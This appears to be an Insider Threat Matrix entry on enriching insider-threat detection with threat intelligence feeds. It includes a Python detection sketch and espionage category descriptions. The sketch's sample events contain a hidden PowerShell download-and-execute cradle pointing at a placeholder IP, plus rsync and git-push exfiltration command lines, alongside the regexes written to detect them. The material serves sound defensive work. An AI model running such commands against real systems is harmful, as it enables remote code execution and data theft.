
Insider Threat Matrix™

  • ID: DT125
  • Created: 21st May 2025
  • Updated: 21st May 2025
  • Contributor: Ryan Bellows

Threat Intelligence Feeds for Insider Threat Indicators

Leverage threat intelligence feeds that include insider-specific indicators—such as behavioral markers, tactics used by recruited insiders, anonymized exfiltration infrastructure, and social engineering methods—to enrich detection of internal threats. Unlike traditional TI feeds that focus on malware or external IPs, insider-focused feeds highlight tactics used to manipulate access, stage data, or coordinate with external actors.


Detection Methods:

Integrate insider-focused threat intelligence sources into SIEM, EDR, or UEBA platforms. These may include:

  • Indicators of misuse of collaboration tools (e.g., OneDrive, Slack, GitHub).
  • VPN or proxy services associated with known data exfiltration actors.
  • Identified techniques for bypassing DLP, such as steganography, encryption layering, or screen scraping.
  • Known burner email domains, decentralized file drop sites, or illicit data markets.


  • Use TI feeds that profile known insider operations—such as previously identified contractors or developers tied to state programs (e.g., North Korean contractor aliases).
  • Cross-reference internal behavior (e.g., file staging, privilege escalation, unusual scripting patterns) with threat actor TTPs derived from known insider incidents.
  • Monitor for command-line syntax, file naming conventions, or tools that match profiles of past insider incidents (e.g., private rsync use, exfil via private Git repos).


Indicators:

  • Use of anonymization tools or services commonly flagged in insider TI feeds.
  • Behavioral sequences (e.g., mass SharePoint access followed by personal cloud login) matching known insider TTPs.
  • Internal tool usage (e.g., PowerShell download cradle, credential harvesting) found in TI reports of insider toolkits.
  • Unusual outbound traffic to infrastructure linked to past insider activity or hybrid APT/insider collaboration cases.
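As an added illustration (not part of the ITM page and not any vendor's product), the Python sketch below shows how an insider-focused TI feed of the kind described under Detection Methods can be applied to SIEM-style events, and how the behavioural sequence listed under Indicators (mass SharePoint access followed by a personal cloud login) is detected alongside the atomic matches. Everything in it is constructed: the feed entries (burner email domains, file-drop domains, anonymizer IPs in RFC 5737 documentation ranges, command-line signatures for a download cradle, rsync to a personal host and git push to a non-corporate remote), the threshold and window values, the personal-cloud domain list, and the sample events.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, hypothetical insider-focused TI feed. A real feed would be
# ingested from a vendor or ISAC export; every value here is illustrative.
INSIDER_TI_FEED = {
    "burner_email_domains": {"tmpmail.example", "dropmail.example"},
    "file_drop_domains": {"anonfiles.example", "filedrop.example"},
    "anonymizer_ips": {"198.51.100.23", "203.0.113.77"},   # RFC 5737 test ranges
    "tool_patterns": [   # command-line signatures from (hypothetical) past incidents
        ("powershell_download_cradle",
         re.compile(r"powershell.*(IEX|Invoke-Expression).*DownloadString", re.I)),
        ("private_rsync_exfil", re.compile(r"\brsync\b.*\s\S+@\S+:", re.I)),
        ("git_push_non_corporate_remote",
         re.compile(r"\bgit\s+push\b.*(github\.com|gitlab\.com)[:/](?!corp-org/)", re.I)),
    ],
}

# Assumed tuning values for the behavioural sequence rule.
MASS_ACCESS_THRESHOLD = 50          # SharePoint file events within the window
SEQUENCE_WINDOW = timedelta(hours=2)
PERSONAL_CLOUD_DOMAINS = {"drive.google.com", "dropbox.com", "mega.nz"}


def match_atomic(event):
    """Return (rule, detail) TI hits for one event: domains, IPs, tool signatures."""
    hits = []
    kind = event["type"]
    if kind == "proxy":
        if event["dest_host"] in INSIDER_TI_FEED["file_drop_domains"]:
            hits.append(("ti_file_drop_domain", event["dest_host"]))
        if event.get("dest_ip") in INSIDER_TI_FEED["anonymizer_ips"]:
            hits.append(("ti_anonymizer_ip", event["dest_ip"]))
    elif kind == "email":
        domain = event["recipient"].rsplit("@", 1)[-1].lower()
        if domain in INSIDER_TI_FEED["burner_email_domains"]:
            hits.append(("ti_burner_email_domain", domain))
    elif kind == "process":
        for rule, pattern in INSIDER_TI_FEED["tool_patterns"]:
            if pattern.search(event["cmdline"]):
                hits.append((rule, event["cmdline"]))
    return hits


def detect_staging_sequence(events):
    """Flag a user whose personal-cloud login is preceded, within SEQUENCE_WINDOW,
    by at least MASS_ACCESS_THRESHOLD SharePoint file events (staging TTP)."""
    by_user = defaultdict(list)
    for ev in events:
        by_user[ev["user"]].append(ev)
    alerts = []
    for user, evs in by_user.items():
        sp_times = sorted(e["ts"] for e in evs if e["type"] == "sharepoint")
        for ev in evs:
            if ev["type"] != "cloud_login" or ev["service"] not in PERSONAL_CLOUD_DOMAINS:
                continue
            recent = [t for t in sp_times if ev["ts"] - SEQUENCE_WINDOW <= t <= ev["ts"]]
            if len(recent) >= MASS_ACCESS_THRESHOLD:
                alerts.append((user, "mass_sharepoint_then_personal_cloud", len(recent)))
    return alerts


def enrich(events):
    """Apply atomic TI matching and the sequence rule; return (user, rule, detail) alerts."""
    alerts = [(ev["user"], rule, detail) for ev in events for rule, detail in match_atomic(ev)]
    alerts.extend(detect_staging_sequence(events))
    return alerts


def stamp(hhmm):
    return datetime(2025, 5, 21, int(hhmm[:2]), int(hhmm[2:]))


# Constructed sample telemetry (not real logs). alice stages data and touches
# TI-listed infrastructure; bob and charlie are benign; dave and eve each trip
# one tool signature.
SAMPLE_EVENTS = (
    [{"ts": stamp("0900") + timedelta(seconds=20 * i), "user": "alice",
      "type": "sharepoint", "action": "FileDownloaded"} for i in range(60)]
    + [{"ts": stamp("0905") + timedelta(minutes=i), "user": "bob",
        "type": "sharepoint", "action": "FileDownloaded"} for i in range(5)]
    + [
        {"ts": stamp("1015"), "user": "alice", "type": "cloud_login", "service": "dropbox.com"},
        {"ts": stamp("1020"), "user": "alice", "type": "proxy",
         "dest_host": "anonfiles.example", "dest_ip": "198.51.100.23"},
        {"ts": stamp("1030"), "user": "alice", "type": "process",
         "cmdline": "rsync -az /tmp/stage/ alice@203.0.113.9:/backup/"},
        {"ts": stamp("1035"), "user": "alice", "type": "email", "recipient": "me@tmpmail.example"},
        {"ts": stamp("0930"), "user": "bob", "type": "cloud_login", "service": "dropbox.com"},
        {"ts": stamp("1100"), "user": "charlie", "type": "process",
         "cmdline": "git push git@github.com:corp-org/service.git main"},
        {"ts": stamp("1105"), "user": "dave", "type": "process",
         "cmdline": "git push https://github.com/dave-personal/dump.git main"},
        {"ts": stamp("1110"), "user": "eve", "type": "process",
         "cmdline": 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                    ".DownloadString('http://203.0.113.77/a.ps1')\""},
    ]
)

if __name__ == "__main__":
    for user, rule, detail in enrich(SAMPLE_EVENTS):
        print(f"{user:8} {rule:36} {detail}")
```

The point of the sequence rule is that neither half is suspicious on its own: bob also downloads from SharePoint and logs into Dropbox, but stays under the threshold, while alice's sixty downloads followed by a personal cloud login within the window match the staging TTP. Atomic feed matches (file-drop domain, anonymizer IP, burner email domain, tool signatures) are listed separately so an analyst can see which TI source produced each hit; in production the feed dictionary would be replaced by a periodic pull from the chosen TI provider and the hardcoded thresholds by per-tenant baselines.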


Examples of Insider-Focused TI Sources:

Sections (ID, Name, Description)

MT017 Espionage

A subject carries out covert actions, such as the collection of confidential or classified information, for the strategic advantage of a nation-state.

MT017.001 Nation-State Alignment

The subject is a current or former asset of a nation-state intelligence service, operating inside the organization with pre-existing loyalty to, or direct affiliation with, a foreign government. Unlike insiders who develop espionage motives post-employment, this subject is often inserted, recruited prior to hiring, or cultivated externally over time and then encouraged to seek access to a target organization.


Their motive is the advancement of strategic objectives on behalf of a foreign nation-state. These objectives may include extracting sensitive information, degrading operational resilience, manipulating internal systems or decisions, weakening public or partner trust, or embedding long-term access for future exploitation. Such subjects may be formal intelligence officers, contract operatives, ideological affiliates, or individuals acting under recruitment, coercion, or influence.


Example Scenarios:


  • A subject recruited during university by a foreign security service secures a role in a telecommunications provider and enables covert surveillance access for state-level eavesdropping.
  • A subject hired into a biopharmaceutical firm has pre-existing links to a state-sponsored “talent program” and transfers research data to affiliated institutions abroad via covert cloud channels.
MT005.002 Corporate Espionage

A third party private organization deploys an individual to a target organization to covertly steal confidential or classified information or gain strategic access for its own benefit.

MT005.001 Speculative Corporate Espionage

A subject covertly collects confidential or classified information, or gains access, with the intent to sell it to a third party private organization.